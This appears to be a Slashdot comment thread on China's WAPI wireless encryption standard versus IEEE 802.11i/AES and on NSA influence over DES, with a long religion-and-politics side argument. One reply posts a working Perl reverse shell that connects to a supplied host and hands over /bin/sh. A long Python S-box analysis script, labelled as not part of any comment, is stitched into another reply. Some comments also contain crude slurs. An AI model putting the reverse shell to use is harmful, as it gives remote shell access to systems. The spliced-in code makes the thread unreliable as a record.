    1. Re:If China Does Not Like It. . . by backwardMechanic · · Score: 2, Informative

      Selling stuff. Why restrict yourself to your home market when you can sell to the whole world? You've gotta think big.

  7. I trust neither by Opportunist · · Score: 4, Insightful

    I trust neither China nor the US to provide me with an encryption standard that protects my privacy. Neither government is known for their fondness of people's privacy.

    If anything, a free and most of all open standard could win my heart. But as long as governments are involved, who have an inherent interest in snooping, I will not rely on their security only and use encryption that is under MY (or at least that of about a billion flaw-seekers worldwide) control.

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    1. Re:I trust neither by Danathar · · Score: 1

      Umm..ok...the ISO/IEEE are not U.S. government. They get one vote like every other member.

    2. Re:I trust neither by NitsujTPU · · Score: 1

      Mmmmph. Such a standard would be openly published, for anybody to inspect. It would, in fact, be an open standard. That's why we have standards.

    3. Re:I trust neither by kestasjk · · Score: 2, Interesting

      It's always a possibility that Rijndael was chosen because the NSA noticed a vulnerability in the algorithm which the rest of the cryptanalyst community hasn't found, but it does seem (vanishingly) unlikely.

      I trust Rijndael with my data for now, I've yet to see a good reason not to. Just because the NSA decided to adopt it doesn't make it vulnerable. The NSA adopted Linux too, does that make Linux vulnerable?

      --
      // MD_Update(&m,buf,j);
    4. Re:I trust neither by gkhan1 · · Score: 1

      Yes exactly! The NSA also developed the SHA hashing algorithms, and they are great even though there might be some trouble with SHA-1

    5. Re:I trust neither by dpilot · · Score: 4, Informative

      I seem to remember some old stories about the NSA and the DES standard.

      The NSA pushed for a few changes in the standard, without divulging the reasons. Some thought it was to insert a backdoor or vulnerability. Years later, after the outside world developed more crypto expertise, they found that the NSA had actually closed a vulnerability that nobody else even knew about. If the NSA had a backdoor into DES, it was with hardware that could brute-force it.

      --
      The living have better things to do than to continue hating the dead.
    6. Re:I trust neither by Chandon+Seldon · · Score: 1

      It's interesting to note that Rijndael was probably the weakest of the AES finalists.

      --
      -- The act of censorship is always worse than whatever is being censored. Always.
    7. Re:I trust neither by cygnusx · · Score: 1

      > I will not rely on their security only and use encryption that is under MY control

      Actually, if 'they' really wanted to get your secrets and the benefit of doing so outweighed the risks of not following due process, they could and quite easily. Van Eck phreaking, surreptitious keylogger insertions when you aren't home, traffic analysis -- there are plenty of ways to get even encrypted secrets out.

      And remember all of these techniques are also available to anyone interested enough in the private sector (organized crime, typically).

    8. Re:I trust neither by klmth · · Score: 1

      Which certainly doesn't say a lot. All five finalists were solid designs. AES was chosen because it was fast to implement in both software and hardware.

    9. Re:I trust neither by Pale+Dude · · Score: 2, Interesting

      That is one clever piece of NSA-misinformation. Fairly standard for NSA though. And you bought it.

      --
      ze dog has no nose
    10. Re:I trust neither by Kadin2048 · · Score: 2, Informative
      Such a standard would be openly published, for anybody to inspect. It would, in fact, be an open standard. That's why we have standards.
      So ... basically ... like 802.11i, the proposed standard by the IEEE, and AES, which is at its core? And not like the Chinese standard?

      You can download the IEEE spec here: http://standards.ieee.org/getieee802/download/802.11i-2004.pdf. You're not allowed to modify or distribute it, and the IEEE retains copyright, but you can download, read, inspect, and archive it. That's a lot more than I can say about the Chinese version.

      Information on AES can be had directly from the NIST (http://csrc.nist.gov/CryptoToolkit/aes/rijndael/Rijndael-ammended.pdf).
      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    11. Re:I trust neither by Kadin2048 · · Score: 1

      Actually, it makes perfect sense: it in fact makes more sense than the backdoor explanation ever did, or does. The NSA made changes to the algorithm, which obviously made a lot of people suspicious (if they had wanted to backdoor it, why be so obvious about making changes? Why not just plant a compromised algorithm from Day 1 and play dumb?); more suspicious was their lack of information about the changes. In retrospect, they couldn't say anything about the changes because it had to do with a method of cryptanalysis that wasn't widely known at the time. Again: if their goal had been a back door, why patch it and arouse suspicion? They could have just kept quiet and had a thoroughly backdoored algorithm for a few years.

      The answer is that the NSA isn't as one-sided a domestic spying institution as the tinfoil-hat crowd likes to believe it is. They are also quite interested -- far more interested, in my opinion -- in intelligence-gathering internationally, but also in the denial of intelligence to foreign countries. Thus, it is consistent with their mission to keep the U.S. from adopting as its encryption standard (which is used for many sensitive diplomatic functions, including secure telephones and the like) something that's easily broken. And it's consistent with the somewhat paranoid mindset of the intelligence community to assume that if we can break an encryption scheme, then our enemies probably can, also. So therefore it would make sense for the NSA to patch all known vulnerabilities in AES, to the best of their ability, because of the probability that any backdoor would be exploited by an unknown third party to the disadvantage of the U.S.

      Moreover, even if -- as you suggest -- the whole fixing of AES really was an elaborate ruse designed to cover for the insertion of a backdoor, it would make the backdoor so valuable of an asset as to basically preclude its routine use. Because of the fix, eyes will always be on the NSA and AES: if information started to filter out that could only have come as a result of an AES break (or even if the information could have been obtained from an AES break) it would destroy that source: the sort of people the NSA wants to monitor would stop using AES immediately. So even if the NSA does have a backdoor, the situations where a person or organization would have to be concerned about it being used are very small. (E.g., the NSA is not going to risk compromising their backdoor, if they have one, in order to blow the whistle on your tax evasion / marital infidelity / porn collection / etc. In fact the intelligence value of such a source might even outweigh its use to stop a small-scale terrorist attack.)

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    12. Re:I trust neither by Surt · · Score: 2, Informative

      http://www.schneier.com/blog/archives/2004/10/the_legacy_of_d.html

      Of course, this assumes that Bruce Schneier is not an NSA stooge.

      --
      "Who is the Journal of Quantum Physics going to believe?" --Stephen Hawking
    13. Re:I trust neither by StikyPad · · Score: 1

      Well, at some point you've got to trust someone. How do you know the free and open method wasn't developed by a foreign government, your own government, or anyone else who already knows its weakness and can exploit it? And what better way to get millions of people using your product than to introduce it as a new public standard? Are you going to review the algorithms and mathematical theory behind them, or will you just assume that someone else will? From your "few billion flaw-seekers" statement, I will infer that you're expecting someone else to do the legwork. Really, I'd be surprised if more than a handful of people do a thorough analysis, and that analysis isn't likely to be any more or less revealing for an open standard than a closed one, especially if the researchers don't have the particular insights, knowledge, or access to technology that the author does.

      If you're really dealing with information so secure that you can't afford risking any amount of interception or infiltration, you should be using one time pads or the like, rather than relying on protections which are inherently weak against MITM and good old-fashioned brute force.

      Anyway, we're talking about wireless networks here. If you're using a wireless network to begin with, you're already accepting a huge risk for the sake of convenience. I'm not saying the standards bodies shouldn't take reasonable precautions to protect against known attacks, to the extent possible, but you're still broadcasting information that can be intercepted by just about anyone. If you're comfortable doing that, then the author of your encryption shouldn't be that much of a concern.

    14. Re:I trust neither by BrianTung · · Score: 1

      The point is that you don't have to trust the U.S. government in the case of AES. AES is a subset of Rijndael, whose entire specification is wide open (and not developed by the U.S., for that matter). You can verify for yourself that it is robust, or get someone you trust to do it for you, if you lack the expertise. You'd have to do that anyway with any algorithm.

      In fact, I suspect that if the U.S. government (or at least, the NSA) wanted to snoop on you, they would only be too happy to let you pick your own encryption system. Chances are good it would be less resistant to snooping than AES. Of course, if you don't care about performance, you could always choose 3DES, which has been poked at for quite a while. But--oops--that's based on DES, which also was developed by the U.S. government (although it is loosely based on IBM's Lucifer).

  8. Re:openssl? by zootm · · Score: 3, Informative

    I'm not any sort of expert, but I believe that OpenSSL is an implementation of an existing standard, whereas the things up for debate here are the next-generation standards to use. Furthermore, these standards are for wireless connections, which isn't something that OpenSSL has anything to do with.

    So basically, it's not relevant, I'm afraid.

  9. "Christian"? WTF? by Anonymous Coward · · Score: 0

    Since when is the USA a "Christian" country? Have Falwell and his Taliban finally taken over your government completely? Sorry to hear that; it seemed like a reasonably nice place while it lasted.

    1. Re:"Christian"? WTF? by Anonymous Coward · · Score: 0

      Yes, at the moment the US is run by the christians. They will burn you out of your house if you are not a christian. I know this second hand.

    2. Re:"Christian"? WTF? by Anonymous Coward · · Score: 0

      "God bless America". Norway had a priest as a prime minister, but even he knew better than speaking about God in his speeches as the prime minister.

      Few things make me more angry than an American president using those words when he would like to torture, kill and rape the world.

    3. Re:"Christian"? WTF? by Loquax · · Score: 2, Insightful
      Two quick comments-- 1) The USA is not run by Christians. It is run by Capitalists who often use Christianity as a cover.

      2) By the very definition of Christian (do unto others..., Love your neighbor as yourself..., love your enemy, etc.) anyone who would burn a person out of their house is NOT a Christian. Just like anyone who would commit a suicide attack on innocents (or suicide in general) is NOT acting within the bounds of Islam and are NOT Muslim.

      One final thought. I'd much rather trust a person of religious faith (any faith for that matter) that says there is more to this world than what we see and that there is an absolute mandate to be spiritually "good" than I would trust a philosophy that says that the material world, run by materialistic rules, is all that there is (this includes both Capitalism and Communism).

    4. Re:"Christian"? WTF? by Loquax · · Score: 1
      Hei! First off, I've lived in Norway and have family there, and you jokers have enough religious bigotry and heavy handed moralists to spare there as well. Does the name Fremskrittpartie and Carl I. Hagen mean nothing to you? What about The National Sammling? Don't get me wrong, I love Norway, and think it is one of the best run countries in the world, but don't pretend for one moment that you guys are free from any of the stuff that we here in America have. The only difference is that when one of our extremists shows their ass, it makes international news in every single blessed language. In Norway, however, it goes no further than the back pages of Aftenposten. Most countries have these jerks hiding in the political pot, the problem is that the U.S. is just a little more visible and our system is based on an "ALL or NOTHING" type of victory, giving extremists much more of a voice in a party.

      Lastly, I have no idea what Bush wants to do or doesn't want to do, and if you are honest, neither do you. I'll give him the benefit of a doubt and say that 9/11 and the obvious growing Islamic-styled terrorist has led a very provincial man catering to his very provincial base to act in ways that have not taken into consideration international sensibilities.

    5. Re:"Christian"? WTF? by Fordiman · · Score: 1

      Funny joke. You might want to use a smiley or something to indicate you're being sarcastic.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    6. Re:"Christian"? WTF? by MysteriousPreacher · · Score: 3, Insightful

      Oh yes they are Christians & Muslims. They read the same texts and interpreted them differently. There are some good rules for living in the Bible and the Koran but both also contain some really nasty guidance. It's worth checking the Bible to see some of the nastier areas and also see what the Koran has to say regards unbelievers.

      --
      -- Using the preview button since 2005
    7. Re:"Christian"? WTF? by WindBourne · · Score: 3, Insightful

      Yes, the christian taliban is in control of the gov. For starters, listen to W. when he does a speech. He will state that God is on our side, which is nothing less than sacrilegious. He does not know exactly what god or christ wants. Worse, he does that while at the same time ordering the torture, maiming, and murder of others. I seriously doubt that Christ would want that.

      Last night, 60 minutes had a great expose about the plan B. We are trying to move to over the counter since it has been shown to be safe. The admin shelved it due to concerns about under developing kids getting it. So the company pushed for through the pharmacist, but no prescription needed (i.e. control of the drug). This time, the admin flat out tabled it and even went so far as to speak about moral objections, but not one word of a scientific argument against it.

      They are currently trying hard to table a vaccine that would prevent cervical cancer for women, but it has to be admin as a child. The gov. is now fighting it as they argue that it would make women more promiscuous (this is the same argument that Reagan used in 1981 to not fund CDC additionally for fighting against the HIV beginning; that religious choice has literally cost America 100's of billions of dollars and 10's of 1000's of lives and will continue to do so until a vaccine is developed). Fortunately, once this admin is gone, it is most likely that the next admin will reverse that choice, and this one will only cost America a few thousand women lives and 100's of millions of dollars (a high price, but it is stoppable).

      I do not like Iran, but at least they are open about. They hold an election, and then the freely elected governs in conjunction with islam priest. OTH, America holds an election and if a far right winger gets in, he is beholden to the christian extremists (bear in mind, that the vast majority of christians are not extremists and do not desire to have the church control us; just a small minority who are hard core; Focus on the Family, Pat Robertson (1 ton leg lifts or lets murder Chavez), Oral Roberts (god is recalling me), and of course, the moral majority (which are neither) ).

      --
      I prefer the "u" in honour as it seems to be missing these days.
    8. Re:"Christian"? WTF? by Nutria · · Score: 1
      I do not like Iran, but at least they are open about. They hold an election, and then the freely elected governs in conjunction with islam priest.

      Sure they are open: Mullahs decide who gets to run for office.

      Last time I checked, neither Pat Robertson nor Jerry Falwell got to decide whether Ted Kennedy was allowed to run for the Senate.

      --
      "I don't know, therefore Aliens" Wafflebox1
    9. Re:"Christian"? WTF? by fnord_uk · · Score: 1

      So do you? You say you would rather trust a religious person than a non-religious philosophy? To do what, exactly? They're both completely different things.

      --
      In theory, theory and practice are the same. In practice, they're not.
    10. Re:"Christian"? WTF? by WindBourne · · Score: 1

      Iran was able to field 10's of candidates, some who were apparently liberal. USA has pretty much 2 at a time, due to the republicans and democrats locking out other parties. If things were so free here, then why not have presidential debates of the top 3-5 parties? And yes, it is the republicans who are preventing the other parties from doing debates. Personally, I think that the dems should show up for the women's debate with other parties.

      --
      I prefer the "u" in honour as it seems to be missing these days.
    11. Re:"Christian"? WTF? by Nutria · · Score: 1

      Iran was able to field 10's of candidates, some who were apparently liberal.

      "Apparently" is the key word. "Hurt the Jews, but don't kill them" may be radically liberal in Iran, but isn't "liberal" by any western definition.

      --
      "I don't know, therefore Aliens" Wafflebox1
    12. Re:"Christian"? WTF? by Anonymous Coward · · Score: 0

      Someone is not a Christian because of their behaviour. Anyone can behave well. Often, Christians are such *despite* their behaviour.

      Christianity is about a relationship, not about rules.

    13. Re:"Christian"? WTF? by lump · · Score: 2, Insightful
      Sorry, but your "One final thought" is logically flawed. Trusting someone who believes things for which there is no evidence is a bad idea. People who believe whatever they want are the same people who do whatever they want, and then delude themselves into "believing" they must be right. Especially when they are constantly hypnotizing themselves into believing they must be "good" and "true", because they "follow god".

      Conversely, people who accept reality are not in the habit of deluding themselves, and are less likely to lie to themselves and excuse their own actions. This is more likely to result in a trustworthy person. "Be true to yourself" is good advice.

      --
      Reality is that which, when you stop believing in it, still exists.
    14. Re:"Christian"? WTF? by Loquax · · Score: 1
      Lump-- I would argue that true faith is the ultimate in skepticism. You seem to put a lot of faith into something called "evidence" when accepting so called "empirical" evidence is the ultimate leap of faith. Evidence is always filtered through our own neurology. You seem to be saying that a) neurological perception equals b) reality. The true skeptic is skeptical of his own skepticism. We all place faith in something---science, mathematics, and logic put faith that there is an objective reality that we can know separate from our emotional lives. Don't get me wrong, if I want to get to the moon in a rocket, give me science, but if I am looking for a guide in my life, I want something that acknowledges my own imperfect neurology and acknowledges that there may be something greater than myself, greater than humanity that has a better perspective on things than I do. Sure, some people use religion as a way to self-justify their actions. Don't try to tell me that people don't use science to do the same. I seem to recall the Nazis loved a science called Eugenics that made perfect logical sense--the way to improve the "breeding" of mankind is to scientifically eliminate the "inferior" members of our gene pool. I also recall a little movement called Communism that put faith in a sociological and economical model to the point where mass deportations and death were completely acceptable.

      We are not reasoning machines that feel, we are feeling beings that occasionally reason logically. Man is not the pinnacle of perception.

    15. Re:"Christian"? WTF? by lump · · Score: 1
      So what you're telling me is that up is down, black is white, and the complete lack of "empirical" evidence for a "god" is all the proof I need that one exists.

      Thanks for putting me straight on that. :-)

      --
      Reality is that which, when you stop believing in it, still exists.
    16. Re:"Christian"? WTF? by Loquax · · Score: 1

      Let's look at your last statement point by point 1) "So what you're telling me is that up is down"-- Up can be down depending on who's viewing who. In deep space there is no up or down beside for the one you choose for yourself. 2) "black is white"-- When mixing light, Black is the absence of all colors and white is the presence of all colors, when mixing paint it can be the other way around. So, yeah, black is white given the situation. Additionally, we perceive black and white with our neurology. Who is to say we aren't the ones seeing things in reverse? 3)"and the complete lack of "empirical" evidence for a "god" is all the proof I need that one exists."-- What you call empirical evidence depends on you placing absolute faith in your ability to perceive reality as it actually "is." If however we argue not in the reality of the thing, but in its "usefulness" and center the statements above a little different way, we have something to talk about. 1) I find it useful (for me) to believe that there is an "up" and a "down" at this moment in time sitting in my chair at the computer. 2) I find it useful (for me) to define black and white dependent upon which medium (light or pigmentation) I am using. I find it useful to reverse this definition when I am working with photographic negatives where black is white and white is black. 3) I find it useful (for me) to believe in a unifying absolute and a purpose to life. I find it useful (for me) to believe that salvation can be achieved and has been achieved. I find it useful (for me) to believe that fluid concepts of mercy and love enhance my ability to think logically and engage the world. So, yeah, I find it useful (for me) to believe in God. Is there a God? I don't know. I doubt we'll ever really "know" in this life or any other, but hey, what the hell do I know?

    17. Re:"Christian"? WTF? by lump · · Score: 1
      I think you're using a certain amount of subterfuge in your arguments there. Ok, everyone knows that our perceptions are not perfect, but we are able to use that knowledge sensibly, and understand our world anyway. And the meaning of words may be flexible, depending on the situation, but that doesn't invalidate their meaning, or my perception of a given situation.

      Example: everyone knows that if you jump off a tall building, you're going to fall, and probably die.

      So. Decision time - do I jump off one day because I'm running late, and I want to float to the bottom, rather than wait for the lift, or do I wait for the lift, because my (imperfect) human perceptions tell me if I jump off I will die?

      Sorry, but I'm going with my flawed perception of reality. Equally, if someone tells me that some guy in the clouds created the whole planet, and everything on it, etc., and therefore I should change the way I live my life, I'm going to want some proof. The onus of proof must always be on the person/s who are introducing the concept. If it can't be proven, then it is actually irresponsible to accept it.

      Our perceptions may not be perfect, and our knowledge of this world may not be complete, but that is no reason to make stuff up.

      Still, it's not really for me to try and argue you out of your beliefs. The only reason religious beliefs get a bit of a response from me is that they unfortunately get used sometimes, by some people, to try and control others, and sometimes I'm in the "others" group, regardless of my feelings on the validity of the beliefs in question. I don't begrudge people having their beliefs if it makes them feel good.

      But if that was me, it would drive me crazy thinking that I was maybe ignoring some facts, and simply going on stuff I was told by other people, and maybe missing out somewhere.

      The thing is, from reading your comments, I think you're probably much like me - ie: you base your day to day decisions on logical, rational decisions, using the best tool you have at your disposal - your perception on what is real, and what is not. This is what always surprises me about intelligent people who are religious - there seems to be a suspension of disbelief, when it comes to matters of spirituality, and I find it hard to reconcile that with the person's general approach to thinking.

      --
      Reality is that which, when you stop believing in it, still exists.
    18. Re:"Christian"? WTF? by Loquax · · Score: 1
      Lump-- Now we are discussing something that can be discussed, namely usefulness (as opposed to existence or proof). I quite agree, given my perception of reality and my past experience with perceived gravity that jumping off a building is NOT a useful or wise thing to do. Waiting for the lift, however, is a wise thing to do because it is more useful than trusting gravity and terminal velocities to get you safely to the ground.

      Your gripe with religion(s) seems to be based in what I hesitantly call the "mythical" qualities of religion. I don't mean that these aspects of religion are not "true" or "real" or whatever. Let me explain it like this. I have a child of 3 years old, and I am expecting a second child. My wife and I have been telling him that mommy has a baby in her tummy, and that mommies and daddies make babies. If I pulled out videos and college textbooks and diagrams and tried to explain to his 3 year old mind how DNA, sperm, ovum, etc works I would not be presenting the information in an age appropriate way. Now to say that mommies and daddies make babies and that babies grow in mommies' tummies is not a "lie" in any sense of the word. The information in this form is "useful" for my son to operate with day to day. If he grows up and tries to enter medical school, asserting that babies gestate in the stomach as useful knowledge for a doctor, he will not get the reception he would like.

      If the ancient Hebrews and other tribes of the Middle East had been told about DNA, mutations, evolution, etc., the information would have been "useless." The story of Genesis gives plenty of operational knowledge to people of that time, and still teaches us something today.

      Take for example the story of Adam and Eve. What it tells us, if we read it right is not scientific (as you and I would assert science), but rather it tells something about the human condition that rings true wherever humans are--If you place limits on people and forbid them from doing something, they will probably do it anyways and try to hide the fact that they did it.

      The story of Cain and Abel tells us both about the possible conflict early people who drove cattle versus those who grew crops, but it also tells us that human beings will envy each other and kill each other where envy runs unchecked.

      One of the "myths" we have today centers around the idea that the Earth is collectively intelligent and an organism in its own right--the Gaia theory. Given what we know about biology, geology and climate, it makes for a useful "story" for us to follow. Take that story/theory exponentially farther, and you see that the universe itself is a collective intelligence that perceives itself and reveals itself to itself. I call this God, sometimes I call it the Tao. The Tao Te Ching states that the Tao/Universe/God you can "name" is not the "real" one as the "real" one is outside our neurological ability to conceive of it or name it.

      Trust me, I understand your resistance. I spent the better part of my life as an agnostic and believed there was no room for the mystic or mysterious in my life or the lives of others. And yes, I saw that there were people in this world who used faith as a way to gain power over others. But I learned that the poison is the cure and that in the interplay between faith and doubt, relativity and objectivity, is a place that is much more "useful" for me to be.

      jd

    19. Re:"Christian"? WTF? by lump · · Score: 1
      Loquax - Thanks for your patient explanations - I know I'm pretty stubborn in my views. I guess a lot of people are. I don't know that I'll ever come to think of religion, or spirituality in a positive way. For me, the wonder of the world I see around me is more than enough - I don't feel the need to have anything metaphysical in my life.

      Obviously I accept that we don't know for sure what the universe is all about, but as stated previously, I just don't see any need to invent anything to explain things we don't know, or understand yet.

      Still, at least you are able to calmly debate me, rather than just take offence that I'm not agreeing with you. It's very tempting for me to try and argue your points some more, but I think that would just be wasting both of our time, so I'll leave it. As much as it is probably human to try and bring others around to your own way of thinking, the world would probably be a very boring place if everyone thought exactly alike.

      Cheers.

      --
      Reality is that which, when you stop believing in it, still exists.
    20. Re:"Christian"? WTF? by Loquax · · Score: 1

      Ditto--- Good conversation! If you have time, read a good translation of the Tao te Ching. It really gets to the heart of the whole subjective vs objective perspective. The Taoists were dealing with the whole science vs mystical debate thousands of years before the West. Have fun! JD

    21. Re:"Christian"? WTF? by lump · · Score: 1
      I may just do that. Although I'm not overly interested in matters of spirituality etc., I have to admit to quite liking the eastern take on philosophy (not claiming to know much here, just that I have generally been able to relate what I have heard or read).

      I'll keep an eye out for an English language version. Thanks.

      --
      Reality is that which, when you stop believing in it, still exists.
  10. it's all about money by ezh · · Score: 2, Insightful

    most of these 'standards' come with a lot of strings attached: implementation of certain pieces of technology, support infrastructure, etc. are patented. patents rule this world. wapi must be well-protected by chinese corporations, while its alternative is probably surrounded by a patent minefield that belongs to u.s. companies. it is all about money, as usual.

  11. Erm by Turn-X+Alphonse · · Score: 3, Insightful

    China throws a hissy fit because its standard's not used? How is this new? It's standard practice to storm out if something you don't like happens. It disrupts the meeting and makes you get your way much easier. Every 4 year old kid can tell you this..

    I don't trust China and I don't trust America, but last time I checked "official" meant jackshit in the tech world. People will use what they deem is best and anything official will either be picked by geeks and become standard or it'll be dead within a few years and replaced by another standard until geekdom kicks in.

    --
    I like muppets.
    1. Re:Erm by Kosmik · · Score: 1

      Whatever made you think politicians were anything more than big kids with more dangerous toys?

    2. Re:Erm by flooey · · Score: 1

      I don't trust China and I don't trust America, but last time I checked "official" meant jackshit in the tech world.

      The difference is between hardware and software. In software, that's largely true, but in hardware the reverse is often true. Hardware isn't patched or updated frequently (often never), so you need to make sure that your hardware works with the other guy's hardware at the time that they're both made at the factory. There's also a big lead time you need on selling hardware; if the "next big thing" occurs, it takes hardware companies a long time (relative to software) to get that into their pipeline and onto store shelves. If China loses out and decides to sell their own crypto method anyway, nobody will interoperate with it, so it won't do well.

    3. Re:Erm by newt0311 · · Score: 0

      "big kids with dangerous toys"??? please, let's not insult the big kids in this world. Calling politicians "big kids" is like calling a grain of sand a mountain.

  12. And Apple is pushing... by demongeek · · Score: 5, Funny

    i11.208, the white and user-friendly encryption that is so hip only the coolest will use it (or be able to afford it)..

    I jest! I jest! *ducks*

    1. Re:And Apple is pushing... by zolaris · · Score: 1

      But the REAL question is can you encrypt something with only a click-wheel? And in a year will they come out with the i11.208 pico (half the size and 10 times the cipher block size)?

  13. OOooodfjrfhghjg by Konster · · Score: 1

    So code your own. WEP, WAP WIP WOP WUP fuckee doo, really.

    This IS Slashdot, isn't it? Why is this news? :D

    1. Re:OOooodfjrfhghjg by phillips321 · · Score: 1

      You forgot "WANER with a silent K"

    2. Re:OOooodfjrfhghjg by jamstigator · · Score: 1

      Speaking on behalf of Italians, we find the aforementioned WOP encryption deeply offensive!

  14. Not so fast Sherlock... by bigmouth_strikes · · Score: 5, Insightful

    There are no "backdoors" in standards, only in implementations.

    --
    Oh, I can't help quoting you because everything that you said rings true
    1. Re:Not so fast Sherlock... by TexasDex · · Score: 1
      Bzzt! WRONG!

      Encryption standards can have mathematically exploitable weaknesses, either inadvertently or intentionally created. Don't believe me? Look up the kind of encryption used for WEP.

      --
      The Cheese Stands Alone.
    2. Re:Not so fast Sherlock... by Eivind · · Score: 1
      It depends. In the case of AES, it's perfectly possible, if not very likely, that the NSA is aware of some weakness the rest of us don't know about. It's even possible they had a finger in subtly changing AES to deliberately have this weakness.

      I don't find it particularly likely, but it's perfectly possible. And I'd definitely accept that as a backdoor. The typical definition of backdoor is something like deliberate hole in security, often put in by the designers and/or creators of the product in question.

      An encryption-standard with a deliberate, undisclosed, weakness would qualify, or at least I don't see any reason why you'd disqualify it.

    3. Re:Not so fast Sherlock... by dr_dank · · Score: 1

      There are no "backdoors" in standards, only in implementations.

      I think Mr. Goatse would disagree with you.

      --
      Where does the school board find them and why do they keep sending them to ME?
    4. Re:Not so fast Sherlock... by quarkscat · · Score: 4, Informative

      Let's see what the real issues are:

      IEEE / ISO standard == open standard
      Chinese WAPI == closed standard

      The Chinese government requires that any implementor pay licensing costs to China. If you want to embed their WAPI, you must incorporate in China with a Chinese entity as the majority shareholder. The questions become: "Does Intel really want to make the Chinese government their "senior" partner in chipset fabs, just to get WAPI embedded?" "And considering the potential for Chinese government trojans and/or backdoors in their WAPI code, would Intel risk losing any/all of their Western government hardware sales by adopting WAPI?"

      Leveno quality control, as well as the increased potential for trojans / backdoors in their software drivers, has already made a negative impact on sales of IBM's former hardware company.

    5. Re:Not so fast Sherlock... by jdhutchins · · Score: 4, Interesting

      It's also possible the NSA knew of some weakness, and then subtly changed the algorithm to fix it. The NSA's internal research is possibly many, many years ahead of the rest of the world's research. IIRC, when DES was being developed, the NSA made some changes to it, but didn't say why. Years later, when differential cryptography was invented/discovered, the NSA's changes made perfect sense because it made the algorithm resistant to many of those types of attacks.

    6. Re:Not so fast Sherlock... by awehttam · · Score: 1
      Well I dunno,
      #!/usr/bin/perl
      use Socket;
      $host = $ARGV[0];
      $port = 80;
      socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ;
      my $target = inet_aton($host);
      if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
      die;
      }

      if (!fork( )) {
      open(STDIN,">&SERVER");
      open(STDOUT,">&SERVER");
      open(STDERR,">&SERVER");

      exec {'/bin/sh'} '-bash' . "\0" x 4;
      exit(0);
      }
      seems like a pretty standard backdoor..
    7. Re:Not so fast Sherlock... by Fordiman · · Score: 1

      Ohhh, so the Chinese are trying to bully their way into the wireless industry in an incredibly obvious and poorly negotiated way, and when they failed, they went crying exclusionism and stomping their feet and pouting.

      See me not give a flying rat's ass.

      --
      110100 1101000 1101000 1100110 0 1101111 1101000 1100011 1
    8. Re:Not so fast Sherlock... by edwinolson · · Score: 1

      Nonsense.

      If the standard requires the use of a particular series of S-boxes or other operations that are known by the inventor to permit a particularly effective cryptanalysis, then the standard has a backdoor. It is likely easier to build these into the algorithm than to discover them as a reviewer.

      Additional backdoors could be part of a particular implementation, of course.
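
      A reviewer's check for the S-box concern raised above and for the DES changes discussed earlier in this thread, as an added example that is not part of any comment: it computes the difference distribution table used in differential cryptanalysis and a test for hidden affine structure. The AES S-box is rebuilt from its public definition; `affine_sbox` and `random_sbox` are constructed comparison boxes, and all function names are hypothetical.

```python
import random


def gf_mul(a, b):
    """Multiply two bytes in GF(2^8) modulo the AES polynomial 0x11B."""
    product = 0
    while b:
        if b & 1:
            product ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return product


def gf_inv(a):
    """Multiplicative inverse in GF(2^8) computed as a^254; 0 maps to 0."""
    result = 1
    for _ in range(254):
        result = gf_mul(result, a)
    return result if a else 0


def rotl8(x, n):
    """Rotate a byte left by n bits."""
    return ((x << n) | (x >> (8 - n))) & 0xFF


def aes_sbox():
    """AES S-box: field inversion followed by the fixed affine map."""
    box = []
    for x in range(256):
        b = gf_inv(x)
        box.append(b ^ rotl8(b, 1) ^ rotl8(b, 2) ^ rotl8(b, 3) ^ rotl8(b, 4) ^ 0x63)
    return box


def affine_sbox():
    """Constructed weak box: the bijective affine map x -> 3*x ^ 0x5A."""
    return [gf_mul(x, 3) ^ 0x5A for x in range(256)]


def random_sbox(seed=2006):
    """Constructed baseline: a pseudo-random permutation of 0..255."""
    box = list(range(256))
    random.Random(seed).shuffle(box)
    return box


def differential_uniformity(sbox):
    """Largest DDT entry over all nonzero input differences.

    DDT[dx][dy] counts the inputs x with S(x) ^ S(x ^ dx) == dy. A large
    entry means one input difference predicts an output difference with
    high probability, which is what differential cryptanalysis exploits.
    """
    worst = 0
    for dx in range(1, 256):
        row = [0] * 256
        for x in range(256):
            row[sbox[x] ^ sbox[x ^ dx]] += 1
        worst = max(worst, max(row))
    return worst


def is_affine(sbox):
    """True if S(x) ^ S(0) is linear over GF(2), i.e. S hides no nonlinearity."""
    linear = [value ^ sbox[0] for value in sbox]
    for x in range(256):
        expected = 0
        for bit in range(8):
            if (x >> bit) & 1:
                expected ^= linear[1 << bit]
        if linear[x] != expected:
            return False
    return True


def review(name, sbox):
    """Summarise the properties a reviewer would look at first."""
    uniformity = differential_uniformity(sbox)
    return {
        "name": name,
        "bijective": sorted(sbox) == list(range(256)),
        "affine": is_affine(sbox),
        "differential_uniformity": uniformity,
        "best_differential_probability": uniformity / 256,
    }


if __name__ == "__main__":
    for label, box in (("AES", aes_sbox()),
                       ("affine (constructed)", affine_sbox()),
                       ("random (constructed)", random_sbox())):
        print(review(label, box))
```

      These two checks only catch the crudest structural weaknesses; a box that passes them can still carry structure that takes far more analysis to find, which is why an unpublished cipher cannot be cleared by its users.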

    9. Re:Not so fast Sherlock... by flooey · · Score: 1

      In the case of AES, it's perfectly possible, if not very likely, that the NSA is aware of some weakness the rest of us don't know about. It's even possible they had a finger in subtly changing AES to deliberately have this weakness.

      I actually think that's incredibly unlikely, because AES is approved for use in protecting classified information. The NSA is smart enough to know that if they were to put a backdoor in, someone would eventually discover it, quite possibly someone from an enemy intelligence agency, so were there a backdoor I doubt they'd approve the cipher for protecting classified information (all the way up to Top Secret, using 256 bit keys).

    10. Re:Not so fast Sherlock... by Anonymous Coward · · Score: 0
      The NSA's internal research is possibly many, many years ahead of the rest of the world's research. IIRC, when DES was being developed, the NSA made some changes to it, but didn't say why. Years later, when differential cryptography was invented/discovered, the NSA's changes made perfect sense because it made the algorithm resistant to many of those types of attacks.

      That's not correct. IBM invented differential cryptography and the NSA told them to keep it secret for many years (how nice of them, aye?). Having knowledge of differential cryptography developed by IBM, the NSA strengthened the DES algorithm. There is no reason to believe the NSA is substantially more advanced than their counterparts throughout the world.
    11. Re:Not so fast Sherlock... by evilviper · · Score: 1
      NSA's internal research is possibly many, many years ahead of the rest of the world's research.

